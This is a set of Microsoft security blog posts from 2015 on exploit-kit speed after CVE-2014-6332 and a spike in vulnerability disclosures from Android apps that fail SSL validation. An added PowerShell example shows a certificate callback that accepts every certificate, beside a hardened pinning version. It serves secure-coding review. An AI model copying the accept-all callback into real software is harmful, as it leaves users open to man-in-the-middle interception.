Some of the CISOs and IT professionals I talk to use this operating system infection rate data to help make a business case for upgrading to newer, more secure software or deploying more secure service packs for their current platforms. As you can see from the latest data, newer is better across the board.

You can download this data in volume 18 of the Microsoft Security Intelligence Report at http://microsoft.com/sir.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

The life and times of an exploit

May 18th, 2015 No comments

Just this week we released the latest Microsoft Security Intelligence Report that focuses on the threat landscape in the second half of 2014. The “featured intelligence” included in the new volume of the report examines the increased speed at which purveyors of commercial exploit kits are trying to take advantage of newly disclosed vulnerabilities, even in cases where security updates have been developed, released and deployed to hundreds of millions of systems around the world.

New exploits are appearing in commercial exploit kits faster
This new research shows us that such attackers are simply trying to take advantage of organizations that have lengthy or long lead time security update testing and deployment processes. Organizations with relatively slow or periodic security update deployment processes should use this research to evaluate whether their current processes continue to be effective at managing related risks or whether new efficiencies are warranted given the increased speed that some modern day attackers have been demonstrating recently. The research confirms what many of the CISOs and security professionals I talk to already know: swiftly testing and applying security updates as they are released remains one of the best ways organizations can protect themselves from attacks.

Microsoft researchers used CVE-2014-6332, which was addressed in Security Bulletin MS14-064, as a case study. The vulnerability was reported to Microsoft, a security update was engineered and tested, and then deployed to hundreds of millions of systems around the world starting on Tuesday November 11th, 2014.

Tools that enable automated reverse engineering of security updates have been around for many years. But from past research we have seen that it can typically take several weeks or even months before such exploits appear as part of commercial exploit kits that attackers can rent or lease. In the second half of 2014 we saw that timeframe reduced dramatically. In the case of CVE-2014-6332 it was first observed being used in commercial exploit kits just 4 or 5 days after the first attacks in the wild were observed.

The Good News
The good news is that by the time these attacks started the security update, MS14-064, had been deployed to hundreds of millions of systems around the world making the exploit ineffective on them. Many organizations that practice rapid security update deployment processes were deploying the update before attackers could start broad attacks using exploit kits. For organizations that had slower deployment processes, Microsoft shared signature development guidance for CVE-2014-6332 with our Active Protections Program (MAPP) partners who released signatures at the same time Microsoft released MS14-064. This helps detect and block attacks using the vulnerability on unpatched systems, thus, in many cases, giving them more time to test and deploy the security update.

Deploying security updates quickly is the most effective mitigation
Once attackers have a working exploit they will continue to try to use it for years into the future. It’s important to promptly install all relevant security updates as soon as is practical as this remains one of the best ways to help defend users and systems against newly discovered threats. It also pays security dividends to use the products from MAPP partners as they work closely with Microsoft to help customers stay ahead of attackers.

You can get full details of this new research in volume 18 of the Microsoft Security Intelligence Report.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

Mass vulnerabilities in Android applications spike industry vulnerability disclosures in 4th Quarter 2014

May 14th, 2015 No comments

We have included data and analysis on industrywide vulnerability disclosures in the Microsoft Security Intelligence Report (SIR) for many years. We compile and analyze this information using vulnerability disclosure data that is published in the National Vulnerability Database (NVD) – the US government’s repository of standards-based vulnerability management data at nvd.nist.gov. The NVD represents all vulnerability disclosures that have a published Common Vulnerabilities and Exposures identifier (CVE).

The vulnerability disclosure data published in the just released volume of the SIR, volume 18, suggests that there was a 56.3% increase in vulnerability disclosures between the third and fourth quarters of 2014. After many periods of relatively small changes in disclosure totals, the 4,512 vulnerabilities disclosed during the second half of 2014 is the largest number of vulnerabilities disclosed in any half-year period since the CVE system was launched in 1999.

Figure 1: Industrywide vulnerability disclosures between the first half of 2012 (1H12) and the second half of 2014 (2H14)

This large increase in disclosures is predominantly the result of work performed by the Computer Emergency Response Team (CERT) Coordination Center (CERT/CC) in the second half of 2014 to scan Android applications in the Google Play Store for man-in-the-middle vulnerabilities using an automated tool called CERT Tapioca.[1] CERT/CC determined that thousands of Android apps fail to properly validate SSL certificates provided by HTTPS connections, which could allow an attacker on the same network as an Android device to perform a man-in-the-middle attack on the device.[2]
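The failure CERT/CC found is not unique to Android. As an added example (mine, not from the original post or from CERT/CC), the PowerShell below shows the equivalent .NET anti-pattern beside a hardened version: a ServicePointManager validation callback that returns true for every certificate is the same bug as an Android TrustManager whose checkServerTrusted() accepts everything, and it lets an attacker on the same network present a forged certificate and read or alter the traffic. The hardened callback keeps the platform’s chain and hostname checks and additionally pins the expected leaf certificate thumbprint. The URL and thumbprint are placeholders I made up for the example.

```powershell
# Added example, not from the original post: the .NET/PowerShell form of the
# "fails to validate the server certificate" bug, beside a hardened callback.
# Assumptions: $expectedThumbprint and the URL are placeholders; the hardened
# callback is meant for a client that talks to one known server.

# --- Vulnerable: accepts any certificate, so a man-in-the-middle with a
#     self-signed or forged certificate is indistinguishable from the real server.
$acceptAll = {
    param($sender, $cert, $chain, $errors)
    return $true
}

# --- Hardened: trust only when platform validation passed AND the leaf
#     certificate is the one this client expects.
$expectedThumbprint = 'AABBCCDDEEFF00112233445566778899AABBCCDD'   # placeholder
$validateAndPin = {
    param($sender, $cert, $chain, $errors)
    # $errors is a System.Net.Security.SslPolicyErrors bitmask. Anything other
    # than None means chain building failed, the name did not match, or no
    # certificate was presented. Never "fix" a failure by returning $true here.
    if ($errors -ne [System.Net.Security.SslPolicyErrors]::None) { return $false }
    $presented = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2($cert)
    return ($presented.Thumbprint -eq $expectedThumbprint)
}

function Test-TlsEndpoint {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][scriptblock]$ValidationCallback
    )
    # The ServicePointManager callback is process-wide: set it, use it, restore it,
    # so a permissive callback can never leak into other code in the same process.
    $previous = [System.Net.ServicePointManager]::ServerCertificateValidationCallback
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $ValidationCallback
    try {
        $request = [System.Net.WebRequest]::Create($Url)
        $request.Method = 'HEAD'
        $response = $request.GetResponse()
        $response.Close()
        return $true
    } catch [System.Net.WebException] {
        # A TrustFailure status here is the callback rejecting the certificate.
        return $false
    } finally {
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $previous
    }
}

# Against a server presenting a self-signed or attacker-supplied certificate,
# the first call "succeeds" and the second is rejected.
Test-TlsEndpoint -Url 'https://example.invalid/' -ValidationCallback $acceptAll
Test-TlsEndpoint -Url 'https://example.invalid/' -ValidationCallback $validateAndPin
```

When reviewing code, the thing to look for is the first pattern: any callback, TrustManager or HostnameVerifier that unconditionally returns true, usually added to "make it work" against a test server and never removed. Pinning is optional; not overriding the platform’s validation is not.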

This project resulted in the creation of almost 1,400 individual CVEs affecting thousands of different publishers of Android apps and code libraries. Without the Android application vulnerabilities discovered by CERT/CC, vulnerability disclosures across the entire industry would have increased about 8% in the second half of 2014 – which would be more consistent with the increases observed over the past several half-year periods.

All of the Android SSL vulnerabilities discovered by CERT/CC are medium-severity (CVSS scores from 4 to 7.9) and medium-complexity vulnerabilities that affect non-operating-system applications. This increased the number of medium-severity and medium-complexity vulnerability disclosures sharply compared to past periods. For example, medium-severity vulnerability disclosures increased from 59.6% of all vulnerabilities in the first half of 2014 to 72.5% in the second half of the year.

Figure 2: (left) Industrywide vulnerability disclosures in the first half of 2014, by severity; (right) Industrywide vulnerability disclosures in the second half of 2014, by severity

Medium-severity vulnerabilities accounted for almost the entire increase in disclosures seen in the last six months of 2014.

Figure 3: Industrywide vulnerability disclosures by severity, between the first half of 2012 (1H12) and the second half of 2014 (2H14)

Some vulnerabilities are easier to exploit than others. Vulnerability complexity is an important factor to consider in determining the risk that each vulnerability poses. The CVSS assigns each vulnerability a complexity ranking of Low, Medium, or High. Medium-complexity vulnerabilities accounted for the largest category of disclosures in the second half of 2014 as well as the bulk of the significant increase in total disclosures observed during the period. Medium-complexity vulnerability disclosures doubled in the period between the first and second halves of 2014, increasing from 48.0% of all disclosures in the first half of the year to 61.5% in the second half of the year. Of note, disclosures of Low-complexity vulnerabilities (those that are the easiest to exploit) also increased significantly in the last six months of 2014. Low-complexity vulnerability disclosures increased 20.3% between the first and second halves of 2014, although their share of all vulnerabilities declined from 48.0% to 36.9% because of the sharp increase in Medium-complexity vulnerability disclosures in the same period.

Figure 4: Industrywide vulnerability disclosures by access complexity, between the first half of 2012 (1H12) and the second half of 2014 (2H14)

Many of the CISOs and security professionals I talk to are typically primarily concerned about vulnerabilities in operating systems and web browsers. But Figure 5 illustrates that there are typically more vulnerability disclosures in applications than in operating systems and browsers combined, and the almost 1,400 individual CVEs affecting thousands of different publishers of Android apps and code libraries accentuate this trend. Disclosures of vulnerabilities in applications other than web browsers and operating system applications increased 98.3% in the second half of 2014 and accounted for 76.5% of total disclosures for the period.

Figure 5: Industrywide operating system, browser, and application vulnerabilities, between the first half of 2012 (1H12) and the second half of 2014 (2H14)

You can get more details on vulnerability disclosure trends in the latest Microsoft Security Intelligence Report, available at http://microsoft.com/sir.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

 

[1] Will Dormann, “Finding Android SSL Vulnerabilities with CERT Tapioca,” Cert/CC Blog, September 3, 2014, http://www.cert.org/blogs/certcc/post.cfm?EntryID=204.

[2] CERT Coordination Center, “Vulnerability Note VU#582497: Multiple Android applications fail to properly validate SSL certificates,” Vulnerability Notes Database, http://www.kb.cert.org/vuls/id/582497.